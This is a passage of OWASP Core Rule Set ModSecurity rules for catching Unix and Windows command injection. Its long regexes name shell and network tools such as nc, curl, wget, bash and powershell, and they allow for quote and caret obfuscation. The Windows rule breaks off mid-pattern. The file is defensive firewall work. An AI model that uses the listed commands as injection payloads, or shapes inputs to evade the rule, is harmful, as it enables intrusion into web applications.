SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\()\s*(?:{|\(|[\w\d_]+=.*)*\s*(?:'|\")*(?:[\w\d'\"\./]+/|[\\\\'\"\^]*\w[\\\\'\"\^]*:.*\\\\|[\^\.\w\d '\"/\\\\]*\\\\)?['\"]*[\\\\'\"\^]?(?:l[\\\\'\"]{0,2}(?:s(?:[\\\\'\"]{0,2}(?:b[\\\\'\"]{0,2}_[\\\\'\"]{0,2}r[\\\\'\"]{0,2}e[\\\\'\"]{0,2}l[\\\\'\"]{0,2}e[\\\\'\"]{0,2}a[\\\\'\"]{0,2}s[\\\\'\"]{0,2}e|c[\\\\'\"]{0,2}p[\\\\'\"]{0,2}u|m[\\\\'\"]{0,2}o[\\\\'\"]{0,2}d|p[\\\\'\"]{0,2}c[\\\\'\"]{0,2}i|u[\\\\'\"]{0,2}s[\\\\'\"]{0,2}b|o[\\\\'\"]{0,2}f))?|z[\\\\'\"]{0,2}(?:(?:[ef][\\\\'\"]{0,2})?g[\\\\'\"]{0,2}r[\\\\'\"]{0,2}e[\\\\'\"]{0,2}p|c[\\\\'\"]{0,2}(?:a[\\\\'\"]{0,2}t|m[\\\\'\"]{0,2}p)|m[\\\\'\"]{0,2}(?:o[\\\\'\"]{0,2}r[\\\\'\"]{0,2}e|a)|d[\\\\'\"]{0,2}i[\\\\'\"]{0,2}f[\\\\'\"]{0,2}f|l[\\\\'\"]{0,2}e[\\\\'\"]{0,2}s[\\\\'\"]{0,2}s)|e[\\\\'\"]{0,2}s[\\\\'\"]{0,2}s(?:[\\\\'\"]{0,2}(?:(?:f[\\\\'\"]{0,2}i[\\\\'\"]{0,2}l|p[\\\\'\"]{0,2}i[\\\\'\"]{0,2}p)[\\\\'\"]{0,2}e|e[\\\\'\"]{0,2}c[\\\\'\"]{0,2}h[\\\\'\"]{0,2}o))?|a[\\\\'\"]{0,2}s[\\\\'\"]{0,2}t(?:[\\\\'\"]{0,2}(?:l[\\\\'\"]{0,2}o[\\\\'\"]{0,2}g(?:[\\\\'\"]{0,2}i[\\\\'\"]{0,2}n)?|c[\\\\'\"]{0,2}o[\\\\'\"]{0,2}m[\\\\'\"]{0,2}m))?|w[\\\\'\"]{0,2}p(?:[\\\\'\"]{0,2}-[\\\\'\"]{0,2}d[\\\\'\"]{0,2}o[\\\\'\"]{0,2}w[\\\\'\"]{0,2}n[\\\\'\"]{0,2}l[\\\\'\"]{0,2}o[\\\\'\"]{0,2}a[\\\\'\"]{0,2}d)?|o[\\\\'\"]{0,2}(?:g[\\\\'\"]{0,2}n[\\\\'\"]{0,2}a[\\\\'\"]{0,2}m[\\\\'\"]{0,2}e|c[\\\\'\"]{0,2}a[\\\\'\"]{0,2}(?:t[\\\\'\"]{0,2}e|l))|f[\\\\'\"]{0,2}t[\\\\'\"]{0,2}p(?:[\\\\'\"]{0,2}g[\\\\'\"]{0,2}e[\\\\'\"]{0,2}t)?|y[\\\\'\"]{0,2}n[\\\\'\"]{0,2}x|p)|p[\\\\'\"]{0,2}(?:k[\\\\'\"]{0,2}(?:g(?:(?:[\\\\'\"]{0,2}_)?[\\\\'\"]{0,2}i[\\\\'\"]{0,2}n[\\\\'\"]{0,2}f[\\\\'\"]{0,2}o)?|e[\\\\'\"]{0,2}x[\\\\'\"]{0,2}e[\\\\'\"]{0,2}c|i[\\\\'\"]{0,2}l[\\\\'\"]{0,2}l)|t[\\\\'\"]{0,2}a[\\\\'\"]{0,2}r(?:[\\\\'\"]{0,2}(?:d[\\\\'\"]{0,2}i[\\\\'\"]{0,2}f[\\\\'\"]{0,2}f|g[\\\\'\"]{0,2}r[\\\\'\"]{0,2}e[\\\\'\"]{0,2}p))
?|(?:a[\\\\'\"]{0,2}s[\\\\'\"]{0,2}s[\\\\'\"]{0,2}w|u[\\\\'\"]{0,2}s[\\\\'\"]{0,2}h|o[\\\\'\"]{0,2}p)[\\\\'\"]{0,2}d|y[\\\\'\"]{0,2}t[\\\\'\"]{0,2}h[\\\\'\"]{0,2}o[\\\\'\"]{0,2}n(?:[\\\\'\"]{0,2}(?:3(?:[\\\\'\"]{0,2}m)?|2))?|e[\\\\'\"]{0,2}r[\\\\'\"]{0,2}(?:l(?:[\\\\'\"]{0,2}(?:s[\\\\'\"]{0,2}h|5))?|m[\\\\'\"]{0,2}s)|r[\\\\'\"]{0,2}i[\\\\'\"]{0,2}n[\\\\'\"]{0,2}t[\\\\'\"]{0,2}e[\\\\'\"]{0,2}n[\\\\'\"]{0,2}v|(?:g[\\\\'\"]{0,2}r[\\\\'\"]{0,2}e|f[\\\\'\"]{0,2}t)[\\\\'\"]{0,2}p|h[\\\\'\"]{0,2}p(?:[\\\\'\"]{0,2}[57])?|i[\\\\'\"]{0,2}n[\\\\'\"]{0,2}g|s)|n[\\\\'\"]{0,2}(?:c(?:[\\\\'\"]{0,2}(?:\.[\\\\'\"]{0,2}(?:t[\\\\'\"]{0,2}r[\\\\'\"]{0,2}a[\\\\'\"]{0,2}d[\\\\'\"]{0,2}i[\\\\'\"]{0,2}t[\\\\'\"]{0,2}i[\\\\'\"]{0,2}o[\\\\'\"]{0,2}n[\\\\'\"]{0,2}a[\\\\'\"]{0,2}l|o[\\\\'\"]{0,2}p[\\\\'\"]{0,2}e[\\\\'\"]{0,2}n[\\\\'\"]{0,2}b[\\\\'\"]{0,2}s[\\\\'\"]{0,2}d)|a[\\\\'\"]{0,2}t))?|e[\\\\'\"]{0,2}t(?:[\\\\'\"]{0,2}(?:k[\\\\'\"]{0,2}i[\\\\'\"]{0,2}t[\\\\'\"]{0,2}-[\\\\'\"]{0,2}f[\\\\'\"]{0,2}t[\\\\'\"]{0,2}p|(?:s[\\\\'\"]{0,2}t|c)[\\\\'\"]{0,2}a[\\\\'\"]{0,2}t))?|s[\\\\'\"]{0,2}(?:l[\\\\'\"]{0,2}o[\\\\'\"]{0,2}o[\\\\'\"]{0,2}k[\\\\'\"]{0,2}u[\\\\'\"]{0,2}p|t[\\\\'\"]{0,2}a[\\\\'\"]{0,2}t)|(?:o[\\\\'\"]{0,2}h[\\\\'\"]{0,2}u|m[\\\\'\"]{0,2}a)[\\\\'\"]{0,2}p|p[\\\\'\"]{0,2}i[\\\\'\"]{0,2}n[\\\\'\"]{0,2}g|a[\\\\'\"]{0,2}n[\\\\'\"]{0,2}o|i[\\\\'\"]{0,2}c[\\\\'\"]{0,2}e)|s[\\\\'\"]{0,2}(?:h(?:[\\\\'\"]{0,2}(?:\.[\\\\'\"]{0,2}d[\\\\'\"]{0,2}i[\\\\'\"]{0,2}s[\\\\'\"]{0,2}t[\\\\'\"]{0,2}r[\\\\'\"]{0,2}i[\\\\'\"]{0,2}b|u[\\\\'\"]{0,2}t[\\\\'\"]{0,2}d[\\\\'\"]{0,2}o[\\\\'\"]{0,2}w[\\\\'\"]{0,2}n|i[\\\\'\"]{0,2}f[\\\\'\"]{0,2}t))?|e[\\\\'\"]{0,2}(?:n[\\\\'\"]{0,2}d[\\\\'\"]{0,2}m[\\\\'\"]{0,2}a[\\\\'\"]{0,2}i[\\\\'\"]{0,2}l|t(?:[\\\\'\"]{0,2}e[\\\\'\"]{0,2}n[\\\\'\"]{0,2}v)?|d)|t[\\\\'\"]{0,2}r[\\\\'\"]{0,2}i[\\\\'\"]{0,2}n[\\\\'\"]{0,2}g[\\\\'\"]{0,2}s|(?:l[\\\\'\"]{0,2}e[\\\\'\"]{0,2}e|f[\\\\'\"]{0,2}t|c)[\\\\'\"]{0,2}p|y[\\\\'\"]{0,2}s[\\\\'\"]{0,2}c[\\\\'\"]{0,2}t[\\\\'\"]{0,2}l|o[\\\\'\"]{0,
2}(?:c[\\\\'\"]{0,2}a|r)[\\\\'\"]{0,2}t|d[\\\\'\"]{0,2}i[\\\\'\"]{0,2}f[\\\\'\"]{0,2}f|u(?:[\\\\'\"]{0,2}d[\\\\'\"]{0,2}o)?|s[\\\\'\"]{0,2}h|v[\\\\'\"]{0,2}n)|t[\\\\'\"]{0,2}(?:c[\\\\'\"]{0,2}(?:p[\\\\'\"]{0,2}(?:t[\\\\'\"]{0,2}r[\\\\'\"]{0,2}a[\\\\'\"]{0,2}c[\\\\'\"]{0,2}e[\\\\'\"]{0,2}r[\\\\'\"]{0,2}o[\\\\'\"]{0,2}u[\\\\'\"]{0,2}t[\\\\'\"]{0,2}e|i[\\\\'\"]{0,2}n[\\\\'\"]{0,2}g)|s[\\\\'\"]{0,2}h)|r[\\\\'\"]{0,2}a[\\\\'\"]{0,2}c[\\\\'\"]{0,2}e[\\\\'\"]{0,2}r[\\\\'\"]{0,2}o[\\\\'\"]{0,2}u[\\\\'\"]{0,2}t[\\\\'\"]{0,2}e(?:[\\\\'\"]{0,2}6)?|i[\\\\'\"]{0,2}m[\\\\'\"]{0,2}e(?:[\\\\'\"]{0,2}o[\\\\'\"]{0,2}u[\\\\'\"]{0,2}t)?|e[\\\\'\"]{0,2}l[\\\\'\"]{0,2}n[\\\\'\"]{0,2}e[\\\\'\"]{0,2}t|a[\\\\'\"]{0,2}(?:i[\\\\'\"]{0,2}l(?:[\\\\'\"]{0,2}f)?|r)|o[\\\\'\"]{0,2}(?:u[\\\\'\"]{0,2}c[\\\\'\"]{0,2}h|p)|y[\\\\'\"]{0,2}p[\\\\'\"]{0,2}e)|m[\\\\'\"]{0,2}(?:y[\\\\'\"]{0,2}s[\\\\'\"]{0,2}q[\\\\'\"]{0,2}l(?:[\\\\'\"]{0,2}(?:d[\\\\'\"]{0,2}u[\\\\'\"]{0,2}m[\\\\'\"]{0,2}p(?:[\\\\'\"]{0,2}s[\\\\'\"]{0,2}l[\\\\'\"]{0,2}o[\\\\'\"]{0,2}w)?|h[\\\\'\"]{0,2}o[\\\\'\"]{0,2}t[\\\\'\"]{0,2}c[\\\\'\"]{0,2}o[\\\\'\"]{0,2}p[\\\\'\"]{0,2}y|a[\\\\'\"]{0,2}d[\\\\'\"]{0,2}m[\\\\'\"]{0,2}i[\\\\'\"]{0,2}n|s[\\\\'\"]{0,2}h[\\\\'\"]{0,2}o[\\\\'\"]{0,2}w))?|l[\\\\'\"]{0,2}o[\\\\'\"]{0,2}c[\\\\'\"]{0,2}a[\\\\'\"]{0,2}t[\\\\'\"]{0,2}e|o[\\\\'\"]{0,2}(?:u[\\\\'\"]{0,2}n[\\\\'\"]{0,2}t|r[\\\\'\"]{0,2}e)|a[\\\\'\"]{0,2}i[\\\\'\"]{0,2}l[\\\\'\"]{0,2}q|k[\\\\'\"]{0,2}d[\\\\'\"]{0,2}i[\\\\'\"]{0,2}r|v)|r[\\\\'\"]{0,2}(?:e[\\\\'\"]{0,2}(?:(?:p[\\\\'\"]{0,2}l[\\\\'\"]{0,2}a[\\\\'\"]{0,2}c|n[\\\\'\"]{0,2}a[\\\\'\"]{0,2}m)[\\\\'\"]{0,2}e|a[\\\\'\"]{0,2}l[\\\\'\"]{0,2}p[\\\\'\"]{0,2}a[\\\\'\"]{0,2}t[\\\\'\"]{0,2}h|s[\\\\'\"]{0,2}e[\\\\'\"]{0,2}t)|u[\\\\'\"]{0,2}b[\\\\'\"]{0,2}y(?:[\\\\'\"]{0,2}(?:1(?:[\\\\'\"]{0,2}[89])?|2[\\\\'\"]{0,2}[012]))?|m(?:[\\\\'\"]{0,2}d[\\\\'\"]{0,2}i[\\\\'\"]{0,2}r)?|n[\\\\'\"]{0,2}a[\\\\'\"]{0,2}n[\\\\'\"]{0,2}o|o[\\\\'\"]{0,2}u[\\\\'\"]{0,2}t[\\\\'\"]{0,2}e|s[\\\\'\"]{0,2}y[\\\\'\"]{0,2}n[\\\\'
\"]{0,2}c|a[\\\\'\"]{0,2}r|c[\\\\'\"]{0,2}p|p[\\\\'\"]{0,2}m)|b[\\\\'\"]{0,2}(?:z[\\\\'\"]{0,2}(?:(?:[ef][\\\\'\"]{0,2})?g[\\\\'\"]{0,2}r[\\\\'\"]{0,2}e[\\\\'\"]{0,2}p|d[\\\\'\"]{0,2}i[\\\\'\"]{0,2}f[\\\\'\"]{0,2}f|l[\\\\'\"]{0,2}e[\\\\'\"]{0,2}s[\\\\'\"]{0,2}s|m[\\\\'\"]{0,2}o[\\\\'\"]{0,2}r[\\\\'\"]{0,2}e|c[\\\\'\"]{0,2}a[\\\\'\"]{0,2}t|i[\\\\'\"]{0,2}p[\\\\'\"]{0,2}2)|s[\\\\'\"]{0,2}d[\\\\'\"]{0,2}(?:c[\\\\'\"]{0,2}a[\\\\'\"]{0,2}t|i[\\\\'\"]{0,2}f[\\\\'\"]{0,2}f|t[\\\\'\"]{0,2}a[\\\\'\"]{0,2}r)|a[\\\\'\"]{0,2}s[\\\\'\"]{0,2}h)|c[\\\\'\"]{0,2}(?:[cdp]|h[\\\\'\"]{0,2}(?:(?:a[\\\\'\"]{0,2}t[\\\\'\"]{0,2}t|d[\\\\'\"]{0,2}i)[\\\\'\"]{0,2}r|f[\\\\'\"]{0,2}l[\\\\'\"]{0,2}a[\\\\'\"]{0,2}g[\\\\'\"]{0,2}s|m[\\\\'\"]{0,2}o[\\\\'\"]{0,2}d)|o[\\\\'\"]{0,2}m[\\\\'\"]{0,2}p[\\\\'\"]{0,2}r[\\\\'\"]{0,2}e[\\\\'\"]{0,2}s[\\\\'\"]{0,2}s|r[\\\\'\"]{0,2}o[\\\\'\"]{0,2}n[\\\\'\"]{0,2}t[\\\\'\"]{0,2}a[\\\\'\"]{0,2}b|u[\\\\'\"]{0,2}r[\\\\'\"]{0,2}l|a[\\\\'\"]{0,2}t|s[\\\\'\"]{0,2}h)|h[\\\\'\"]{0,2}(?:t[\\\\'\"]{0,2}(?:d[\\\\'\"]{0,2}i[\\\\'\"]{0,2}g[\\\\'\"]{0,2}e[\\\\'\"]{0,2}s[\\\\'\"]{0,2}t|p[\\\\'\"]{0,2}a[\\\\'\"]{0,2}s[\\\\'\"]{0,2}s[\\\\'\"]{0,2}w[\\\\'\"]{0,2}d)|o[\\\\'\"]{0,2}s[\\\\'\"]{0,2}t[\\\\'\"]{0,2}(?:n[\\\\'\"]{0,2}a[\\\\'\"]{0,2}m[\\\\'\"]{0,2}e|i[\\\\'\"]{0,2}d)|i[\\\\'\"]{0,2}s[\\\\'\"]{0,2}t[\\\\'\"]{0,2}o[\\\\'\"]{0,2}r[\\\\'\"]{0,2}y|e[\\\\'\"]{0,2}(?:a[\\\\'\"]{0,2}d|l[\\\\'\"]{0,2}p))|x[\\\\'\"]{0,2}(?:z(?:[\\\\'\"]{0,2}(?:(?:[ef][\\\\'\"]{0,2})?g[\\\\'\"]{0,2}r[\\\\'\"]{0,2}e[\\\\'\"]{0,2}p|d[\\\\'\"]{0,2}(?:i[\\\\'\"]{0,2}f[\\\\'\"]{0,2}f|e[\\\\'\"]{0,2}c)|c[\\\\'\"]{0,2}(?:a[\\\\'\"]{0,2}t|m[\\\\'\"]{0,2}p)|l[\\\\'\"]{0,2}e[\\\\'\"]{0,2}s[\\\\'\"]{0,2}s|m[\\\\'\"]{0,2}o[\\\\'\"]{0,2}r[\\\\'\"]{0,2}e))?|a[\\\\'\"]{0,2}r[\\\\'\"]{0,2}g[\\\\'\"]{0,2}s|t[\\\\'\"]{0,2}e[\\\\'\"]{0,2}r[\\\\'\"]{0,2}m)|e[\\\\'\"]{0,2}(?:x[\\\\'\"]{0,2}(?:p[\\\\'\"]{0,2}(?:a[\\\\'\"]{0,2}n[\\\\'\"]{0,2}d|o[\\\\'\"]{0,2}r[\\\\'\"]{0,2}t|r)|e[\\\\'\"]{0,2}c|i[\\\\'\"]{0,2}t)|n[\\\\'\"
]{0,2}v(?:[\\\\'\"]{0,2}-[\\\\'\"]{0,2}u[\\\\'\"]{0,2}p[\\\\'\"]{0,2}d[\\\\'\"]{0,2}a[\\\\'\"]{0,2}t[\\\\'\"]{0,2}e)?|g[\\\\'\"]{0,2}r[\\\\'\"]{0,2}e[\\\\'\"]{0,2}p|c[\\\\'\"]{0,2}h[\\\\'\"]{0,2}o|v[\\\\'\"]{0,2}a[\\\\'\"]{0,2}l)|i[\\\\'\"]{0,2}(?:p[\\\\'\"]{0,2}(?:(?:6[\\\\'\"]{0,2})?t[\\\\'\"]{0,2}a[\\\\'\"]{0,2}b[\\\\'\"]{0,2}l[\\\\'\"]{0,2}e[\\\\'\"]{0,2}s|c[\\\\'\"]{0,2}o[\\\\'\"]{0,2}n[\\\\'\"]{0,2}f[\\\\'\"]{0,2}i[\\\\'\"]{0,2}g)|f[\\\\'\"]{0,2}c[\\\\'\"]{0,2}o[\\\\'\"]{0,2}n[\\\\'\"]{0,2}f[\\\\'\"]{0,2}i[\\\\'\"]{0,2}g|r[\\\\'\"]{0,2}b(?:[\\\\'\"]{0,2}(?:1(?:[\\\\'\"]{0,2}[89])?|2[\\\\'\"]{0,2}[012]))?|d)|z[\\\\'\"]{0,2}(?:(?:(?:[ef][\\\\'\"]{0,2})?g[\\\\'\"]{0,2}r[\\\\'\"]{0,2}e|i)[\\\\'\"]{0,2}p|c[\\\\'\"]{0,2}(?:a[\\\\'\"]{0,2}t|m[\\\\'\"]{0,2}p)|d[\\\\'\"]{0,2}i[\\\\'\"]{0,2}f[\\\\'\"]{0,2}f|l[\\\\'\"]{0,2}e[\\\\'\"]{0,2}s[\\\\'\"]{0,2}s|m[\\\\'\"]{0,2}o[\\\\'\"]{0,2}r[\\\\'\"]{0,2}e|r[\\\\'\"]{0,2}u[\\\\'\"]{0,2}n|s[\\\\'\"]{0,2}h)|u[\\\\'\"]{0,2}n[\\\\'\"]{0,2}(?:c[\\\\'\"]{0,2}o[\\\\'\"]{0,2}m[\\\\'\"]{0,2}p[\\\\'\"]{0,2}r[\\\\'\"]{0,2}e[\\\\'\"]{0,2}s[\\\\'\"]{0,2}s|l[\\\\'\"]{0,2}z[\\\\'\"]{0,2}m[\\\\'\"]{0,2}a|a[\\\\'\"]{0,2}m[\\\\'\"]{0,2}e|r[\\\\'\"]{0,2}a[\\\\'\"]{0,2}r|z[\\\\'\"]{0,2}i[\\\\'\"]{0,2}p|x[\\\\'\"]{0,2}z)|f[\\\\'\"]{0,2}(?:t[\\\\'\"]{0,2}p(?:[\\\\'\"]{0,2}(?:s[\\\\'\"]{0,2}t[\\\\'\"]{0,2}a[\\\\'\"]{0,2}t[\\\\'\"]{0,2}s|w[\\\\'\"]{0,2}h[\\\\'\"]{0,2}o))?|e[\\\\'\"]{0,2}t[\\\\'\"]{0,2}c[\\\\'\"]{0,2}h|g[\\\\'\"]{0,2}r[\\\\'\"]{0,2}e[\\\\'\"]{0,2}p|i[\\\\'\"]{0,2}n[\\\\'\"]{0,2}d|o[\\\\'\"]{0,2}r|c)|d[\\\\'\"]{0,2}(?:h[\\\\'\"]{0,2}c[\\\\'\"]{0,2}l[\\\\'\"]{0,2}i[\\\\'\"]{0,2}e[\\\\'\"]{0,2}n[\\\\'\"]{0,2}t|(?:m[\\\\'\"]{0,2}e[\\\\'\"]{0,2}s|p[\\\\'\"]{0,2}k)[\\\\'\"]{0,2}g|a[\\\\'\"]{0,2}(?:s[\\\\'\"]{0,2}h|t[\\\\'\"]{0,2}e)|i[\\\\'\"]{0,2}f[\\\\'\"]{0,2}f|u)|w[\\\\'\"]{0,2}(?:h[\\\\'\"]{0,2}(?:i[\\\\'\"]{0,2}(?:c[\\\\'\"]{0,2}h|l[\\\\'\"]{0,2}e)|o(?:[\\\\'\"]{0,2}a[\\\\'\"]{0,2}m[\\\\'\"]{0,2}i)?)|r[\\\\'\"]{0,2}i[\\\\'\"]{0,2}t[\\\
\'\"]{0,2}e|g[\\\\'\"]{0,2}e[\\\\'\"]{0,2}t|3[\\\\'\"]{0,2}m)|g[\\\\'\"]{0,2}(?:(?:u[\\\\'\"]{0,2}n[\\\\'\"]{0,2}z[\\\\'\"]{0,2}i|r[\\\\'\"]{0,2}e)[\\\\'\"]{0,2}p|z[\\\\'\"]{0,2}(?:c[\\\\'\"]{0,2}a[\\\\'\"]{0,2}t|i[\\\\'\"]{0,2}p)|c[\\\\'\"]{0,2}c|d[\\\\'\"]{0,2}b|i[\\\\'\"]{0,2}t)|a[\\\\'\"]{0,2}(?:p[\\\\'\"]{0,2}t[\\\\'\"]{0,2}-[\\\\'\"]{0,2}g[\\\\'\"]{0,2}e[\\\\'\"]{0,2}t|l[\\\\'\"]{0,2}i[\\\\'\"]{0,2}a[\\\\'\"]{0,2}s|r[\\\\'\"]{0,2}(?:c[\\\\'\"]{0,2}h|p))|j[\\\\'\"]{0,2}(?:e[\\\\'\"]{0,2}x[\\\\'\"]{0,2}e[\\\\'\"]{0,2}c|a[\\\\'\"]{0,2}v[\\\\'\"]{0,2}a)|k[\\\\'\"]{0,2}i(?:[\\\\'\"]{0,2}l[\\\\'\"]{0,2}l[\\\\'\"]{0,2}a)?[\\\\'\"]{0,2}l[\\\\'\"]{0,2}l|o[\\\\'\"]{0,2}p[\\\\'\"]{0,2}e[\\\\'\"]{0,2}n(?:[\\\\'\"]{0,2}s[\\\\'\"]{0,2}s[\\\\'\"]{0,2}l)?|(?:v[\\\\'\"]{0,2}i|y[\\\\'\"]{0,2}u)[\\\\'\"]{0,2}m|7[\\\\'\"]{0,2}z(?:[\\\\'\"]{0,2}[ar])?|G[\\\\'\"]{0,2}E[\\\\'\"]{0,2}T)(\.\w+)?\b" \
    "msg:'Remote Command Execution: Unix command injection',\
    phase:request,\
    rev:'3',\
    ver:'OWASP_CRS/3.0.0',\
    maturity:'8',\
    accuracy:'8',\
    capture,\
    t:none,\
    ctl:auditLogParts=+E,\
    block,\
    id:932100,\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-rce',\
    tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\
    tag:'WASCTC/WASC-31',\
    tag:'OWASP_TOP_10/A1',\
    tag:'PCI/6.5.2',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    severity:'CRITICAL',\
    setvar:'tx.msg=%{rule.msg}',\
    setvar:tx.rce_score=+%{tx.critical_anomaly_score},\
    setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},\
    setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/RCE-%{matched_var_name}=%{tx.0}"

# Windows commands
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\()\s*(?:{|\(|[\w\d_]+=.*)*\s*(?:'|\")*(?:[\w\d'\"\./]+/|[\\\\'\"\^]*\w[\\\\'\"\^]*:.*\\\\|[\^\.\w\d '\"/\\\\]*\\\\)?['\"]*[\\\\'\"\^]?(?:p[\"\^]{0,2}(?:s(?:[\"\^]{0,2}(?:s[\"\^]{0,2}(?:h[\"\^]{0,2}u[\"\^]{0,2}t[\"\^]{0,2}d[\"\^]{0,2}o[\"\^]{0,2}w[\"\^]{0,2}n|e[\"\^]{0,2}r[\"\^]{0,2}v[\"\^]{0,2}i[\"\^]{0,2}c[\"\^]{0,2}e|u[\"\^]{0,2}s[\"\^]{0,2}p[\"\^]{0,2}e[\"\^]{0,2}n[\"\^]{0,2}d)|l[\"\^]{0,2}(?:o[\"\^]{0,2}g[\"\^]{0,2}(?:g[\"\^]{0,2}e[\"\^]{0,2}d[\"\^]{0,2}o[\"\^]{0,2}n|l[\"\^]{0,2}i[\"\^]{0,2}s[\"\^]{0,2}t)|i[\"\^]{0,2}s[\"\^]{0,2}t)|p[\"\^]{0,2}(?:a[\"\^]{0,2}s[\"\^]{0,2}s[\"\^]{0,2}w[\"\^]{0,2}d|i[\"\^]{0,2}n[\"\^]{0,2}g)|g[\"\^]{0,2}e[\"\^]{0,2}t[\"\^]{0,2}s[\"\^]{0,2}i[\"\^]{0,2}d|e[\"\^]{0,2}x[\"\^]{0,2}e[\"\^]{0,2}c|f[\"\^]{0,2}i[\"\^]{0,2}l[\"\^]{0,2}e|i[\"\^]{0,2}n[\"\^]{0,2}f[\"\^]{0,2}o|k[\"\^]{0,2}i[\"\^]{0,2}l[\"\^]{0,2}l))?|r[\"\^]{0,2}(?:n[\"\^]{0,2}(?:c[\"\^]{0,2}n[\"\^]{0,2}f[\"\^]{0,2}g|m[\"\^]{0,2}n[\"\^]{0,2}g[\"\^]{0,2}r)|i[\"\^]{0,2}n[\"\^]{0,2}t(?:[\"\^]{0,2}b[\"\^]{0,2}r[\"\^]{0,2}m)?|o[\"\^]{0,2}m[\"\^]{0,2}p[\"\^]{0,2}t)|o[\"\^]{0,2}(?:w[\"\^]{0,2}e[\"\^]{0,2}r[\"\^]{0,2}(?:s[\"\^]{0,2}h[\"\^]{0,2}e[\"\^]{0,2}l[\"\^]{0,2}l|c[\"\^]{0,2}f[\"\^]{0,2}g)|r[\"\^]{0,2}t[\"\^]{0,2}q[\"\^]{0,2}r[\"\^]{0,2}y|p[\"\^]{0,2}d)|a[\"\^]{0,2}(?:t[\"\^]{0,2}h(?:[\"\^]{0,2}p[\"\^]{0,2}i[\"\^]{0,2}n[\"\^]{0,2}g)?|u[\"\^]{0,2}s[\"\^]{0,2}e)|e[\"\^]{0,2}r[\"\^]{0,2}(?:f[\"\^]{0,2}m[\"\^]{0,2}o[\"\^]{0,2}n|l(?:[\"\^]{0,2}(?:s[\"\^]{0,2}h|5))?)|y[\"\^]{0,2}t[\"\^]{0,2}h[\"\^]{0,2}o[\"\^]{0,2}n(?:[\"\^]{0,2}(?:3(?:[\"\^]{0,2}m)?|2))?|k[\"\^]{0,2}g[\"\^]{0,2}m[\"\^]{0,2}g[\"\^]{0,2}r|u[\"\^]{0,2}s[\"\^]{0,2}h[\"\^]{0,2}d|h[\"\^]{0,2}p(?:[\"\^]{0,2}[57])?|i[\"\^]{0,2}n[\"\^]{0,2}g)|s[\"\^]{0,2}(?:h[\"\^]{0,2}(?:o[\"\^]{0,2}(?:w[\"\^]{0,2}(?:g[\"\^]{0,2}r[\"\^]{0,2}p|m[\"\^]{0,2}b[\"\^]{0,2}r)[\"\^]{0,2}s|r[\"\^]{
0,2}t[\"\^]{0,2}c[\"\^]{0,2}u[\"\^]{0,2}t)|e[\"\^]{0,2}l[\"\^]{0,2}l[\"\^]{0,2}r[\"\^]{0,2}u[\"\^]{0,2}n[\"\^]{0,2}a[\"\^]{0,2}s|u[\"\^]{0,2}t[\"\^]{0,2}d[\"\^]{0,2}o[\"\^]{0,2}w[\"\^]{0,2}n|a[\"\^]{0,2}r[\"\^]{0,2}e|i[\"\^]{0,2}f[\"\^]{0,2}t)|e[\"\^]{0,2}(?:t(?:[\"\^]{0,2}(?:l[\"\^]{0,2}o[\"\^]{0,2}c[\"\^]{0,2}a[\"\^]{0,2}l|x))?|l[\"\^]{0,2}e[\"\^]{0,2}c[\"\^]{0,2}t)|c(?:[\"\^]{0,2}(?:h[\"\^]{0,2}t[\"\^]{0,2}a[\"\^]{0,2}s[\"\^]{0,2}k[\"\^]{0,2}s|l[\"\^]{0,2}i[\"\^]{0,2}s[\"\^]{0,2}t))?|y[\"\^]{0,2}s[\"\^]{0,2}t[\"\^]{0,2}e[\"\^]{0,2}m[\"\^]{0,2}i[\"\^]{0,2}n[\"\^]{0,2}f[\"\^]{0,2}o|u[\"\^]{0,2}b[\"\^]{0,2}(?:i[\"\^]{0,2}n[\"\^]{0,2}a[\"\^]{0,2}c[\"\^]{0,2}l|s[\"\^]{0,2}t)|l(?:[\"\^]{0,2}(?:e[\"\^]{0,2}e[\"\^]{0,2}p|m[\"\^]{0,2}g[\"\^]{0,2}r))?|p(?:[\"\^]{0,2}(?:j[\"\^]{0,2}b|p[\"\^]{0,2}s|s[\"\^]{0,2}v))?|a[\"\^]{0,2}(?:j[\"\^]{0,2}b|p[\"\^]{0,2}s|s[\"\^]{0,2}v|l)|o[\"\^]{0,2}(?:o[\"\^]{0,2}n|r[\"\^]{0,2}t)|t[\"\^]{0,2}a[\"\^]{0,2}r[\"\^]{0,2}t|(?:w[\"\^]{0,2}m[\"\^]{0,2})?i|v(?:[\"\^]{0,2}n)?|b[\"\^]{0,2}p|f[\"\^]{0,2}c)|c[\"\^]{0,2}(?:l[\"\^]{0,2}(?:[cpsv]|e[\"\^]{0,2}a[\"\^]{0,2}(?:r(?:[\"\^]{0,2}m[\"\^]{0,2}e[\"\^]{0,2}m)?|n[\"\^]{0,2}m[\"\^]{0,2}g[\"\^]{0,2}r)|u[\"\^]{0,2}s[\"\^]{0,2}t[\"\^]{0,2}e[\"\^]{0,2}r|i(?:[\"\^]{0,2}p)?|h[\"\^]{0,2}y)|o[\"\^]{0,2}(?:m[\"\^]{0,2}p(?:[\"\^]{0,2}a[\"\^]{0,2}(?:c[\"\^]{0,2}t|r[\"\^]{0,2}e))?|n[\"\^]{0,2}(?:2[\"\^]{0,2}p|v[\"\^]{0,2}e)[\"\^]{0,2}r[\"\^]{0,2}t|l[\"\^]{0,2}o[\"\^]{0,2}r|p[\"\^]{0,2}y)|h[\"\^]{0,2}(?:k[\"\^]{0,2}(?:n[\"\^]{0,2}t[\"\^]{0,2}f[\"\^]{0,2}s|d[\"\^]{0,2}s[\"\^]{0,2}k)|(?:a[\"\^]{0,2}n[\"\^]{0,2}g|o[\"\^]{0,2}i[\"\^]{0,2}c)[\"\^]{0,2}e|d[\"\^]{0,2}i[\"\^]{0,2}r)|s[\"\^]{0,2}(?:c[\"\^]{0,2}(?:r[\"\^]{0,2}i[\"\^]{0,2}p[\"\^]{0